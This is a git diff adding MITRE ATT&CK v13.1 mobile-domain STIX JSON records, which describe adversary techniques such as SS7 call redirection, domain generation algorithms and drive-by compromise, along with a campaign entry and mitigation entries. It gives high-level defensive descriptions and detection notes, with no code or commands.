"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json new file mode 100644 index 0000000000000000000000000000000000000000..c77b66682659285962bd580310fcfba299453f96 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--1be02b0a-6cd7-4892-8992-987f7dfc6a6d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", + "created": "2017-10-25T14:48:06.524Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1449", + "url": "https://attack.mitre.org/techniques/T1449" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "TheRegister-SS7", + "url": "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/", + "description": "Iain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018." + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-37" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).", + "modified": "2022-04-06T15:53:27.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Redirect Phone Calls/SMS", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the Communications, Security, Reliability, and Interoperability Council (CSRIC). (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json new file mode 100644 index 0000000000000000000000000000000000000000..fa9723a2d1e3a5e34f013f0629b071ac7b2aa853 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--1c25481c-0e7c-41af-a03a-97e1b75b7ba0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:57.485Z", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application\u2019s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications in the device settings. Application vetting services could potentially detect the usage of APIs intended for artifact hiding.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "created": "2022-03-30T20:00:12.654Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628", + "external_id": "T1628" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json new file mode 100644 index 0000000000000000000000000000000000000000..5a100fa44f10b40dc39dd5cc1271baaf724f95fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--433b4d09-a250-4603-b36e-804281a9f1d7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:37:55.822Z", + "name": "Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. \n\nMobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.\n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "created": "2022-03-30T18:13:26.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632/001", + "external_id": "T1632.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json new file mode 100644 index 0000000000000000000000000000000000000000..b37ea416a71027c6377cbc6f688e191bc56478c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--b012da54-ad4e-4585-83df-de13a6c0e0ed", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "created": "2022-04-05T19:59:03.161Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637.001", + "url": "https://attack.mitre.org/techniques/T1637/001" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T19:59:22.888Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json new file mode 100644 index 0000000000000000000000000000000000000000..a4b00673c79ce7d7426da31fe5f74147527db19d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c194d6e6-111e-4c69-9a9f-be1b5f92a224", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:24:56.530Z", + "name": "Drive-By Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can often alert the user if their device is vulnerable to known exploits.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "created": "2017-10-25T14:48:06.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1456", + "external_id": "T1456" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html", + "external_id": "CEL-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json new file mode 100644 index 0000000000000000000000000000000000000000..df1e1a4878d2aca0986064ece569a47d56ecf8e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--5a32fc9f-9879-4112-8eeb-3c2efd8efdd9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "created": "2019-07-11T18:09:42.039Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1508", + "url": "https://attack.mitre.org/techniques/T1508" + }, + { + "source_name": "sunny-stolen-credentials", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "bankbot-spybanker", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.\n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)", + "modified": "2022-03-30T20:07:33.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suppress Application Icon", + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json b/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json new file mode 100644 index 0000000000000000000000000000000000000000..7c3a28507d799db6f8df61cd92973232624c6c83 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--637b46b8-8146-4635-878e-0f17f646cb91", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json new file mode 100644 index 0000000000000000000000000000000000000000..8be427100df7dee9693074b66550a22e9d595bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--c573ead3-04f5-4c38-9379-a9299fc069dd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "type": "course-of-action", + "created": "2017-10-25T14:48:51.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json new file mode 100644 index 0000000000000000000000000000000000000000..2f19c8aeed726ff6be743b0dfcf03a7395c848b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--15fea9dd-e9f1-4463-84ac-0e57dda42e51", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--1553b156-6767-47f7-9eb4-2a692505666d", + "created": "2019-10-18T12:49:58.924Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1005", + "url": "https://attack.mitre.org/mitigations/M1005" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.\n\nEnterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.\n\nApplication Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.", + "modified": "2022-04-06T14:47:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Vetting", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json new file mode 100644 index 0000000000000000000000000000000000000000..80f3a3ee0cb237f6e538d24175cdb6cd79d5f482 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--9df178e1-7e46-4aac-8d02-06d1dcbb0a7f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json new file mode 100644 index 0000000000000000000000000000000000000000..7c89f505b0cb1d195fd3589884419eebb4cf347b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--b72a9ad0-cfc6-4fff-8be5-1ec72e2efc46", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "modified": "2020-06-24T15:08:18.395Z", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json new file mode 100644 index 0000000000000000000000000000000000000000..7e6a728a49acd46ed1df3ff9e95ac82e7d140ffa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--3c40b91e-d0c1-4bde-bb2f-f1ee090eb9a6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "type": "course-of-action", + "created": "2019-10-18T12:53:03.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1011", + "url": "https://attack.mitre.org/mitigations/M1011" + } + ], + "modified": "2019-10-18T15:51:48.318Z", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.", + "x_mitre_version": "1.0", + 